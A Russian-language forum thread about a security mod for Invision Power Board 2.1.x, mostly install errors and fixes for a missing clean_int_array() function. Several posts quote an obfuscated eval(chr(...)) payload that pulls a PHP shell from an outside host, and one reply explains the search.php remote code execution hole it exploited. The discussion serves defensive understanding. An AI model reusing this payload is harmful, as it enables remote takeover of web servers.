[2.1.x]Advanced input data verifier

[western]

перешол с версии 2.1.3 где этот мод работал на версию 2.1.4 и естесна обновил мод до 1.0.3 ,тк теперь у меня при попытке зайти в любой из форумов белый экран.

[Maniac]

Хм,а чем этот мод отличается от официального?

Это который в новостях был:

IPB 2.x.x: Обновление безопасности

[Hugo Weaving]

после установки при входе в какой-либо топик:

 

Fatal error: Call to undefined function: clean_int_array() in z:\home\localhost\www\forums\sources\action_public\forums.php on line 81

[Hugo Weaving]

перешол с версии 2.1.3 где этот мод работал на версию 2.1.4 и естесна обновил мод до 1.0.3 ,тк теперь у меня при попытке зайти в любой из форумов белый экран.

Та же ерунда, да + ещё это высвечивается:

 

 

 

Fatal error: Call to undefined function: clean_int_array() in z:\home\localhost\www\forums\sources\action_public\forums.php on line 81

[Arhar]

Ну не названа функция clean_int_array..

Нет её..

Нигде..

У меня почему то есть..Наверно GD библиотека опять?Мой рулящий крутой хостинг, где всё включено?

[freeman85]

у меня такое както было такое, давноооо... я просо скопировал функцию

 

	function clean_value( $t )
{
	return $this->parse_clean_value( $t );
}

 

и переименовал её в clean_int_array))

 

а вообще вот она:

 

 

source/ipclass.php

	function clean_int_array( $array=array() )
{
	$return = array();

	if ( is_array( $array ) and count( $array ) )
	{
		foreach( $array as $k => $v )
		{
			$return[ intval($k) ] = intval($v);
		}
	}

	return $return;
}

[Vic'er]

Ну не названа функция clean_int_array..

Нет её..

Нигде..

Нужно своевременно следить и устанавливать все оффициальные обновления - будет меньше проблем

[Arhar]

ээээ...

эта функция как раз находилась в заменяемом коде по моду

так что мод её просто сносил

те кто ставил обновления как раз таки её теряли..

те кто не ставил-не теряли...

только что правил такую же ошибку на тестовом форуме

[Skifius]

Поставил себе ибо вещь нужнейшая: кто защищен, тот вооружен!

 

Тем, у кого стоит мод mJournal (ЖЖ):

 

в файле journal.php (который лежит в корне форума) найти

require ROOT_PATH."sources/functions.php";

 

выше добавить

require ROOT_PATH."sources/in_data_rules.php";

 

Без этого мод работать не будет, не использует он стандартный index.php...

 

а в mjournal 2.0.7 для форума 2.1.х что добавить?

[microbius]

Сегодня от греха подальше поставил эту заплатку

Спасибо!

 

а подвигли меня на этот подвиг сообщения подобные приведенному ниже

кстати, кто эначит что это значит? а то я не в кукурсе, но выглядит стремно....

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(107). chr(115). chr(105). chr(101). chr(103). chr(105). chr(103). chr(111). chr(115). chr(99). chr(105). chr(46). chr(104). chr(111). chr(116). chr(110). chr(101). chr(119). chr(115). chr(46). chr(112). chr(108). chr(47). chr(102). chr(105). chr(108). chr(101). chr(115). chr(47). chr(114).chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

[Vic'er]

кстати, кто эначит что это значит? а то я не в кукурсе, но выглядит стремно....

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(107). chr(115). chr(105). chr(101). chr(103). chr(105). chr(103). chr(111). chr(115). chr(99). chr(105). chr(46). chr(104). chr(111). chr(116). chr(110). chr(101). chr(119). chr(115). chr(46). chr(112). chr(108). chr(47). chr(102). chr(105). chr(108). chr(101). chr(115). chr(47). chr(114).chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

include "http://ksiegigosci.hotnews.pl/files/r.txt"

[pikachu]

Fatal error: Call to undefined function: clean_int_array() in /pub/home/******/htdocs/forum/sources/action_public/topics.php on line 2664

 

стоит оф. дистрибутив 2.1.7 (скаченый из клиентзоны в августе (апдейты стоят все). Ошибка такая

[Vic'er]

clean_int_array одна из функций, оффициально добавленых на момент выхода этого мода.

 

совместимость с более поздними версиями (2.1.7 в частности) гарантировать не могу, так как по причинам, от меня не зависящим, я в данный момент не занимаюсь программированием под IPB, а значит знать особенности более поздних версий не могу.

[jamber]

После установки на 2.1.7 начались глюки с браузерами в эксплодере при переходе в любой топик или при нажатии на посл.сообщение появляется только чистая страница. В фаейрфоксе и в опере все нормально работает.

[toha]

есть конфликты с модом репутации

[Avatara9]

версия форума 2.1.6 все поставилось и работает, под оперой,мозилой,эксплорером проблем нет, спасибо за мод

[toha]

кстати, а чего просто не написать отдельную функцию, где указать и описать все "бяки" при возможной sql inj и инклудить в критические файлы форума?

 

так же намного проще и кода аж 10-15 строк + в 5 основных файлов форума добавить по инклуду с этой функцией

[Scream89]

Fatal error: Call to undefined function: clean_int_array() in /pub/home/******/htdocs/forum/sources/action_public/topics.php on line 2664

 

стоит оф. дистрибутив 2.1.7 (скаченый из клиентзоны в августе (апдейты стоят все). Ошибка такая

Тоже такая ошибка.

 

Кто-нибудь может его сделать под 2.1.7?

[pikachu]

Scream89: на прошлой странице написали как пофиксить (мод вырезает кусок функции этой). у меня всё работает

[-Зверик-]

Vic'er, только что нашел баг... как я рад что его нашел, думал что у меня или датабаза странным образом глючная, или враги наслали черную магию; в общем такой баг:

 

В последней ibProArcade v3.2.0 Final (тут http://www.ibresource.ru/db/795/ ) невозможен переход на index.php?autocom=arcade&p=settings, index.php?autocom=arcade&p=hof или любую другую страницу отличную от главной.

 

Буду благодарен если исправишь!

 

Спасибо

[-Зверик-]

ау?... :-\

[-Зверик-]

Поддержки не будет? (

[LordBone]

Приём! Ребят, есть тут кто-нибудь живой. Я заинтересовался этим модом, но, вот, думаю: ставить или нет?

 

И кстате, по-руский, мужете объяснить, если на форуме какой-нибудь чел опубликовывает подобное, что эт значит?

кстати, кто эначит что это значит? а то я не в кукурсе, но выглядит стремно....

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(107). chr(115). chr(105). chr(101). chr(103). chr(105). chr(103). chr(111). chr(115). chr(99). chr(105). chr(46). chr(104). chr(111). chr(116). chr(110). chr(101). chr(119). chr(115). chr(46). chr(112). chr(108). chr(47). chr(102). chr(105). chr(108). chr(101). chr(115). chr(47). chr(114).chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

include "http://ksiegigosci.hotnews.pl/files/r.txt"

Только словами, пожалуйста

[-Зверик-]

Ок, отвечу.

 

Гадские малолетние падонки пытались заинклудить шелл. Php shell - это а-ля windows explorer на сервере, позволяет файлы закачивать, удалять, смотреть, править и т.д., по сути полный контроль с удобным интерфейсом.

 

Глюк заключался в том, что при поиске по форуму по новому зарегистрированному юзеру производится вывод сообщений (а именно ищется новое сообщение с данным кодом, которое он только что создал), а "//" в конце закомментирует далее идущий код.. (не помню точно.. закомментирование что-то сбрасывает в скрипте). в общем получается так, что при поиске подобного сообщения, в search.php происходит глюк, и код этот запускается. Давно это было, но работает приблизительно так.

(Если кто знает как обьяснить лучше, и как я обьяснил вам показалось наивным и неправильным, то объясните лучше.)

 

Оригинальный експлоит тут _http://milw0rm.com/exploits/1726 , называется он "Invision Power Board <= 2.1.5 search.php Remote Code Execution Exploit".

 

В общем, следи за новыми уязвимостями на milw0rm, проверяй новые патчи на IPB, патчься вовремя, и будет тебе счастье.

 

:0)

[Arhar]

Remote Code Execution

собственно, можно любой свой код екзекьютить, важно что содержится в $exploitme

а заплатка - Обновление безопасности в IPB 2.x.x (25.04.06)

пните меня, если я ошибаюсь